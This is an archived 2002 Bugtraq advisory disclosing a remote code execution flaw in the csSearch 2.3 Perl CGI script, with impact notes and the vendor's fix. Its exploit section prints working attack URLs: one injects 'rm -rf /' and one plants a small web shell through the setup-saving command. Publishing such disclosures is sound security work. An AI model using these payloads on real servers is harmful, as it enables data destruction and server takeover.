![[LWN Logo]](/images/lcorner.png) |
|
![[LWN.net]](/images/Included.png) |
From: Steve Gustin <stegus1@yahoo.com>
To: bugtraq@securityfocus.com
Subject: CGIscript.net - csSearch.cgi - Remote Code Execution (up to 17,000 sites vulnerable)
Date: Mon, 25 Mar 2002 14:47:23 -0800 (PST)
CGIscript.net - csSearch.cgi - Remote Code Execution
(up to 17,000 sites vulnerable)
---------------------------------------------------------------------
Name : csSearch.cgi - Remote Code Execution
Date : March 25, 2002
Product : csSearch
Version : 2.3 (vulnerable)
Vuln Type : Access Validation Error
Severity : HIGH RISK
Vendor : WWW.CGIscript.NET, LLC.
Homepage : http://www.cgiscript.net/
DISCUSSION:
---------------------------------------------------------------------
csSearch is a free perl cgi search script developed by
Mike Barone and Andy Angrick. According to the website
(cgiscript.net) over 17,000 people have downloaded
csSearch.
csSearch stores it's configuration data as perl code
in a file called "setup.cgi" which is eval()uated by
the script to load it back into memory at runtime.
Due to an Access Validation Error, any user can cause
configuration data to be written to "setup.cgi" and
therefore execute arbitrary perl code on the server.
The paid version of this script, csSearch Pro, may
also be vulnerable.
EXPLOIT:
---------------------------------------------------------------------
Configuration data is saved with the following URL.
Note that any perl code would need to be URL encoded.
csSearch.cgi?command=savesetup&setup=PERL_CODE_HERE
For example, the classic "rm -rf /" example would be
as follows:
csSearch.cgi?command=savesetup&setup=`rm%20-rf%20/`
Here's something a little more interesting, less than
300 bytes of code that turns csSearch into a remote
web shell of sorts.
*ShowSearchForm = *Login = sub {
print "<form method=post action=csSearch.cgi>Enter
Command (eg: ls -l)<br>";
print "<input type=text name=cmd size=99> ";
print "<input type=submit value=Execute><hr><xmp>";
$in{'cmd'} && print `$in{'cmd'} 2>&1`;
exit;
};
URL Encoded as:
csSearch.cgi?command=savesetup&setup=*ShowSearchForm%3D*Login%3Dsub{print"<form+method%3Dpost+action%3DcsSearch.cgi>Enter+Command+(example:+ls+-l)<br><input+type%3Dtext+name%3Dcmd+size%3D99>+<input+type%3Dsubmit+value%3DExecute><hr><xmp>";$in{'cmd'}%26%26print`$in{'cmd'}+2>%261`;exit;};
IMPACT:
---------------------------------------------------------------------
Because of the high number of users who have
downloaded this script (over 17,000 according to
cgiscript.net) and the fact that search engines can
easily be used to identify sites with the unique
"csSearch.cgi" script name, the risk posed by this
flaw is very high indeed.
SOLUTION:
---------------------------------------------------------------------
Vendor has released a new version, csSearch 2.5, which
patches the flaw.
ISPs and Web hosts may want to consider searching for
this script on their servers ("csSearch.cgi") and
disabling it or advising their customers of the risk
until they can install the patched version.
DISCLAIMER
---------------------------------------------------------------------
The information within this document may change
without notice. Use of this information constitutes
acceptance for use in an AS IS condition. There are NO
warranties with regard to this information. In no
event shall the author be liable for any consequences
whatsoever arising out of or in connection with the
use or spread of this information. Any use of this
information lays within the user's responsibility.
FEEDBACK:
---------------------------------------------------------------------
stegus1@yahoo.com
__________________________________________________
Do You Yahoo!?
Yahoo! Movies - coverage of the 74th Academy Awards®
http://movies.yahoo.com/